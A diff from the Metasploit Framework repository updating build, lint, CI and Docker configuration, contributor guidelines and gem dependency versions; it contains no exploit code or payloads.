automatic module_metadata_base.json update

Land #11205 , Add support for Linux and pubprn.vbs to web_delivery
Revert "Add evasion module applocker_evasion_install_util"
2019-07-25 07:31:54 -07:00 · 2019-07-25 07:18:00 -07:00 · 2019-07-24 10:49:55 -05:00 · 2019-07-23 11:40:31 -07:00 · 2019-07-23 11:32:40 -07:00 · 2019-07-23 10:31:38 -07:00
1701 changed files with 383532 additions and 8122 deletions
@@ -5,6 +5,8 @@ docker-compose*.yml
 docker/
 !docker/msfconsole.rc
 !docker/entrypoint.sh
+!docker/database.yml
+Dockerfile
 README.md
 .git/
 .github/
@@ -2,6 +2,8 @@
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.

+Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
+
 ## Verification

 List the steps needed to make sure this thing works
@@ -93,3 +93,7 @@ docker-compose.local*
 # Ignore python bytecode
 *.pyc
 rspec.failures
+
+
+#Ignore any base disk store files
+db/modules_metadata_base.pstore
@@ -64,7 +64,6 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
-bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.2
+  TargetRubyVersion: 2.4

 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/AlignHash:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
 Layout/AlignParameters:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -1 +1 @@
-2.5.1
+2.6.2
@@ -11,9 +11,8 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.7'
-  - '2.4.4'
-  - '2.5.1'
+  - '2.5.5'
+  - '2.6.2'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -25,11 +24,14 @@ matrix:
 jobs:
  # build docker image
  include:
-  - env: CMD="docker-compose build" DOCKER="true"
+  - env: CMD="/usr/bin/docker-compose build" DOCKER="true"
    # we do not need any setup
    before_install: skip
    install: skip
-    before_script: skip
+    before_script:
+      - curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
+      - chmod +x docker-compose
+      - sudo mv docker-compose /usr/bin
 before_install:
  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
  - rake --version
@@ -38,6 +40,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
+  - gem update --system
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -49,7 +52,9 @@ before_script:
 script:
  - echo "${CMD}"
    # we need travis_wait because the Docker build job can take longer than 10 minutes
-  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+    #- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+    # docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
+  - bash -c "${CMD}"

 notifications:
  irc: "irc.freenode.org#msfnotify"
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report directly to
-egypt@metasploit.com or todb@metasploit.com.
+caitlin_condon@rapid7.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -1,82 +1,57 @@
 # Hello, World!

 Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!
-
-Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
-Please try to be as specific as you can about your problem; include steps
-to reproduce (cut and paste from your console output if it's helpful) and
-what you were expecting to happen.
-
-Are you about to report a security vulnerability in Metasploit itself?
-How ironic! Please take a look at Rapid7's [Vulnerability
-Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
-your report to security@rapid7.com using our [PGP key].
-
-Are you about to contribute some new functionality, a bug fix, or a new
-Metasploit module? If so, read on...
+world -- a better place!  Before you get started, review our
+[Code of Conduct].  There are mutliple ways to help beyond just writing code:
+ - [Submit bugs and feature requests] with detailed information about your issue or idea.
+ - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
+ - [Report a security vulnerability in Metasploit itself] to Rapid7.
+ - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
+   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.

 # Contributing to Metasploit

-What you see here in CONTRIBUTING.md is a bullet point list of the do's
-and don'ts of how to make sure *your* valuable contributions actually
-make it into Metasploit's master branch.
-
-If you care not to follow these rules, your contribution **will** be
-closed. Sorry!
-
-This is intended to be a **short** list. The [wiki] is much more
-exhaustive and reveals many mysteries. If you read nothing else, take a
-look at the standard [development environment setup] guide
-and Metasploit's [Common Coding Mistakes].
+Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
+it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
+**will** be closed. Sorry!

 ## Code Contributions

-* **Do** stick to the [Ruby style guide].
-* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Don't** use the default merge messages when merging from other branches.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
 * **Do** create a [topic branch] to work on instead of working directly on `master`.
- If you do not send a PR from a topic branch, the history of your PR will be
- lost as soon as you update your own master branch. See
- https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
- this in action.
+  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
+  allows for a location for more commits to be offered without mingling with other contributor changes,
+  and allows contributors to make progress while a PR is still being reviewed.


 ### Pull Requests

-* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
+* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
+* **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
-* **Do** write [release notes] once a pull request is landed.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

-Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
+Pull request [PR#9966] is a good example to follow.

 #### New Modules

-* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
-  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
-* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
+* **Do** use the many module mixin [API]s.
 * **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
-
-
-
-#### Scripts
-
-* **Don't** submit new [scripts].  Scripts are shipped as examples for
-  automating local tasks, and anything "serious" can be done with post
-  modules and local exploits.
+* **Do** include [Module Documentation] showing sample run-throughs.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
+  anything "serious" can be done with post modules and local exploits.

 #### Library Code

-* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
+* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
@@ -84,44 +59,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
 #### Bug Fixes

 * **Do** include reproduction steps in the form of verification steps.
-* **Do** include a link to any corresponding [Issues] in the format of
-  `See #1234` in your commit description.
+* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

 ## Bug Reports

-* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
+Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security). 
+
+When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
+* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.

-If you need some more guidance, talk to the main body of open
-source contributors over on the [Freenode IRC channel],
-or e-mail us at the [metasploit-hackers] mailing list.
+If you need some more guidance, talk to the main body of open source contributors over on our
+[Metasploit Slack] or [#metasploit on Freenode IRC].

-Also, **thank you** for taking the few moments to read this far! You're
-already way ahead of the curve, so keep it up!
+Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
+curve, so keep it up!

-[Issue Tracker]:http://r-7.co/MSF-BUGv1
-[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
-[wiki]:https://github.com/rapid7/metasploit-framework/wiki
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
-[development environment setup]:http://r-7.co/MSF-DEV
-[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
+[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
+[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
+[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
+[development environment]:http://r-7.co/MSF-DEV
+[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
+[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
-[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
-[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
+[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
+[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://betterspecs.org
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
+[Metasploit Slack]:https://www.metasploit.com/slack
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,36 +1,22 @@
-FROM ruby:2.5.1-alpine3.7
+FROM ruby:2.6.2-alpine3.9 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
-ENV APP_HOME /usr/src/metasploit-framework/
-ENV NMAP_PRIVILEGED=""
+ENV APP_HOME=/usr/src/metasploit-framework
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME

-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
 COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
 COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
 COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb

-RUN apk update && \
-    apk add \
-      bash \
-      sqlite-libs \
-      nmap \
-      nmap-scripts \
-      nmap-nselibs \
-      postgresql-libs \
-      python \
-      python3 \
-      ncurses \
-      libcap \
-      su-exec \
-    && apk add --virtual .ruby-builddeps \
+RUN apk add --no-cache \
      autoconf \
      bison \
      build-base \
      ruby-dev \
-      libressl-dev \
+      openssl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
@@ -43,21 +29,38 @@ RUN apk update && \
      git \
    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && gem install bundler \
-    && bundle install --system $BUNDLER_ARGS \
-    && apk del .ruby-builddeps \
-    && rm -rf /var/cache/apk/*
+    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    # temp fix for https://github.com/bundler/bundler/issues/6680
+    && rm -rf /usr/local/bundle/cache \
+    # needed so non root users can read content of the bundle
+    && chmod -R a+r /usr/local/bundle
+
+
+FROM ruby:2.6.2-alpine3.9
+LABEL maintainer="Rapid7"
+
+ENV APP_HOME=/usr/src/metasploit-framework
+ENV NMAP_PRIVILEGED=""
+ENV METASPLOIT_GROUP=metasploit
+
+# used for the copy command
+RUN addgroup -S $METASPLOIT_GROUP
+
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

-ADD ./ $APP_HOME
+COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
+COPY --chown=root:metasploit . $APP_HOME/
+RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
+
+WORKDIR $APP_HOME

 # we need this entrypoint to dynamically create a user
 # matching the hosts UID and GID so we can mount something
 # from the users home directory. If the IDs don't match
-# it results in access denied errors. Once docker has
-# a solution for this we can revert it back to normal
+# it results in access denied errors.
 ENTRYPOINT ["docker/entrypoint.sh"]

-CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
@@ -3,6 +3,8 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.17.2)
+    metasploit-framework (4.17.72)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -9,7 +9,9 @@ PATH
      bcrypt
      bcrypt_pbkdf
      bit-struct
+      concurrent-ruby (= 1.0.5)
      dnsruby
+      ed25519
      faker
      filesize
      jsobfu
@@ -18,9 +20,9 @@ PATH
      metasploit-concern
      metasploit-credential (< 3.0.0)
      metasploit-model
-      metasploit-payloads (= 1.3.40)
+      metasploit-payloads (= 1.3.70)
      metasploit_data_models (< 3.0.0)
-      metasploit_payloads-mettle (= 0.4.1)
+      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
      nessus_rest
@@ -35,7 +37,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (= 0.20.0)
+      pg (~> 0.20)
      railties
      rb-readline
      recog
@@ -53,7 +55,7 @@ PATH
      rex-random_identifier
      rex-registry
      rex-rop_builder
-      rex-socket
+      rex-socket (= 0.1.17)
      rex-sslscan
      rex-struct2
      rex-text
@@ -74,72 +76,73 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.10)
-      actionview (= 4.2.10)
-      activesupport (= 4.2.10)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.10)
-      activesupport (= 4.2.10)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.10)
-      activesupport (= 4.2.10)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.10)
-      activemodel (= 4.2.10)
-      activesupport (= 4.2.10)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.10)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.2)
+    addressable (2.6.0)
      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.7.0)
-      activerecord (>= 3.1.0, < 6)
-    backports (3.11.3)
-    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
-    bindata (2.4.3)
+    arel-helpers (2.9.1)
+      activerecord (>= 3.1.0, < 7)
+    backports (3.15.0)
+    bcrypt (3.1.13)
+    bcrypt_pbkdf (1.0.1)
+    bindata (2.4.4)
    bit-struct (0.16)
    builder (3.2.3)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    crass (1.0.4)
    diff-lcs (1.3)
-    dnsruby (1.61.1)
+    dnsruby (1.61.2)
      addressable (~> 2.5)
-    docile (1.3.1)
+    docile (1.3.2)
+    ed25519 (1.2.4)
    erubis (2.7.0)
    factory_girl (4.9.0)
      activesupport (>= 3.0.0)
    factory_girl_rails (4.9.0)
      factory_girl (~> 4.9.0)
      railties (>= 3.0.0)
-    faker (1.9.1)
+    faker (1.9.6)
      i18n (>= 0.7)
-    faraday (0.15.2)
+    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
-    filesize (0.1.1)
-    fivemat (1.3.6)
+    filesize (0.2.0)
+    fivemat (1.3.7)
    hashery (2.1.2)
    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.1.0)
-    loofah (2.2.2)
+    json (2.2.0)
+    loofah (2.2.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    metasm (1.0.3)
+    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -157,55 +160,55 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.40)
-    metasploit_data_models (2.0.16)
+    metasploit-payloads (1.3.70)
+    metasploit_data_models (2.0.17)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg (= 0.20.0)
+      pg
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.4.1)
-    method_source (0.9.0)
-    mini_portile2 (2.3.0)
+    metasploit_payloads-mettle (0.5.16)
+    method_source (0.9.2)
+    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.4)
-    multipart-post (2.0.0)
+    msgpack (1.3.0)
+    multipart-post (2.1.1)
    nessus_rest (0.1.6)
-    net-ssh (5.0.2)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.8.4)
-      mini_portile2 (~> 2.3.0)
-    octokit (4.9.0)
+    nokogiri (1.10.3)
+      mini_portile2 (~> 2.4.0)
+    octokit (4.14.0)
      sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.1)
+    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    patch_finder (1.0.2)
-    pcaprub (0.12.4)
-    pdf-reader (2.1.0)
+    pcaprub (0.13.0)
+    pdf-reader (2.2.0)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.20.0)
+    pg (0.21.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.1)
      activerecord (~> 4.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
-    pry (0.11.3)
+    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (3.0.2)
-    rack (1.6.10)
+    public_suffix (3.1.1)
+    rack (1.6.11)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
@@ -216,19 +219,19 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.4)
      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.10)
-      actionpack (= 4.2.10)
-      activesupport (= 4.2.10)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.3.1)
+    rake (12.3.2)
    rb-readline (0.5.5)
-    recog (2.1.20)
+    recog (2.3.2)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
      rex-text
-    rex-bin_tools (0.1.4)
+    rex-bin_tools (0.1.6)
      metasm
      rex-arch
      rex-core
@@ -239,7 +242,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.19)
+    rex-exploitation (0.1.21)
      jsobfu
      metasm
      rex-arch
@@ -252,7 +255,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.78)
+    rex-powershell (0.1.82)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -262,72 +265,72 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.14)
+    rex-socket (0.1.17)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.21)
+    rex-text (0.2.22)
    rex-zip (0.1.3)
      rex-text
    rkelly-remix (0.0.7)
-    rspec (3.7.0)
-      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.7.0)
-    rspec-core (3.7.1)
-      rspec-support (~> 3.7.0)
-    rspec-expectations (3.7.0)
+    rspec (3.8.0)
+      rspec-core (~> 3.8.0)
+      rspec-expectations (~> 3.8.0)
+      rspec-mocks (~> 3.8.0)
+    rspec-core (3.8.2)
+      rspec-support (~> 3.8.0)
+    rspec-expectations (3.8.4)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.7.0)
-    rspec-mocks (3.7.0)
+      rspec-support (~> 3.8.0)
+    rspec-mocks (3.8.1)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.7.0)
-    rspec-rails (3.7.2)
+      rspec-support (~> 3.8.0)
+    rspec-rails (3.8.2)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
-      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.7.0)
-      rspec-support (~> 3.7.0)
+      rspec-core (~> 3.8.0)
+      rspec-expectations (~> 3.8.0)
+      rspec-mocks (~> 3.8.0)
+      rspec-support (~> 3.8.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.7.1)
-    ruby-macho (2.0.0)
+    rspec-support (3.8.2)
+    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
-    ruby_smb (1.0.3)
+    ruby_smb (1.1.0)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (1.2.1)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
-    simplecov (0.16.1)
+    rubyzip (1.2.3)
+    sawyer (0.8.2)
+      addressable (>= 2.3.5)
+      faraday (> 0.8, < 2.0)
+    simplecov (0.17.0)
      docile (~> 1.1)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.2)
    sqlite3 (1.3.13)
-    sshkey (1.9.0)
-    thor (0.20.0)
+    sshkey (2.0.0)
+    thor (0.20.3)
    thread_safe (0.3.6)
    timecop (0.9.1)
    ttfunk (1.5.1)
    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2018.5)
+    tzinfo-data (1.2019.2)
      tzinfo (>= 1.0.0)
    windows_error (0.1.2)
    xdr (2.0.0)
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.14)
+    yard (0.9.20)

 PLATFORMS
  ruby
@@ -343,8 +346,9 @@ DEPENDENCIES
  rspec-rails
  rspec-rerun
  simplecov
+  sqlite3 (~> 1.3.0)
  timecop
  yard

 BUNDLED WITH
-   1.16.2
+   1.17.3
@@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
-Copyright: 2006-2010 Yoann GUILLOT
-License: LGPL-2.1
-
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -1,130 +1,124 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.2, MIT
-actionpack, 4.2.9, MIT
-actionview, 4.2.9, MIT
-activemodel, 4.2.9, MIT
-activerecord, 4.2.9, MIT
-activesupport, 4.2.9, MIT
-addressable, 2.5.1, "Apache 2.0"
+Ascii85, 1.0.3, MIT
